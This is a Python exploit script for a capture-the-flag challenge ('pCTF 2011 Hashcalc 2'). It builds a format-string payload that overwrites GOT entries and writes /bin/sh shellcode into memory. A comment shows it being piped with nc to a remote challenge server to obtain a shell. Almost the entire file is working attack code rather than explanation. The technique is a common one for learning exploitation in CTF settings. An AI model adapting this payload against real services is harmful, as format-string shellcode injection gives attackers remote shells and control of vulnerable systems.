#!/usr/bin/env python
# pCTF 2011 - #26 Hashcalc 2
# Shellcode in the GOT using multiple write2 since there was no NX
# Only difference with #22 is to use 2 write1 not to have a 0x0a (\n)

# $ { python exploit.py; cat; } |nc a9.amalgamated.biz 10241
# ** Welcome to the online hash calculator **
# $ id
# uid=1008(hashcalc2) gid=1009(hashcalc2) groups=1009(hashcalc2)

from struct import pack,unpack

# /bin/sh - 24 bytes (2*12)
SC = "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80A"

offset = 5
got_vsprintf = 0x08049108
sc_addr = got_vsprintf+4
p = ""

# 1) to rewrite strlen's got with address of shellcode
# we cannot do 2 write2 because got_vsprintf+2 = ......0a :(
# so we do write1 + write2 + write1
p += pack("<I", got_vsprintf)
p += pack("<I", got_vsprintf+1)
p += pack("<I", got_vsprintf+3)

# 2) to write shellcode right after vsprintf's got
for i in range(0,len(SC),2): 
  p += pack("<I", sc_addr+i)

# do 1) being attentive on the number of bytes written by the format string
val = sc_addr
low,medium,high = val&0xFF, (val>>8)&0xFFFF, val>>24
wrote = len(p)
p += "%."+str((low-wrote)&0xFF) + "u%"+str(offset)+"$hhn"
wrote += (low-wrote)&0xFF
p += "%."+str((medium-wrote)&0xFFFF) + "u%"+str(offset+1)+"$hn"
wrote += (medium-wrote)&0xFFFF
p += "%."+str((high-wrote)&0xFF) + "u%"+str(offset+2)+"$hhn"
wrote += (high-wrote)&0xFF

# do 2)
for i in range(len(SC)/2): 
  val = unpack("<H", SC[2*i:][:2])[0]
  p += "%."+str((val-wrote)&0xFFFF)+"u%"+str(offset+3+i)+"$hn"
  wrote += (val-wrote)&0xFFFF

print p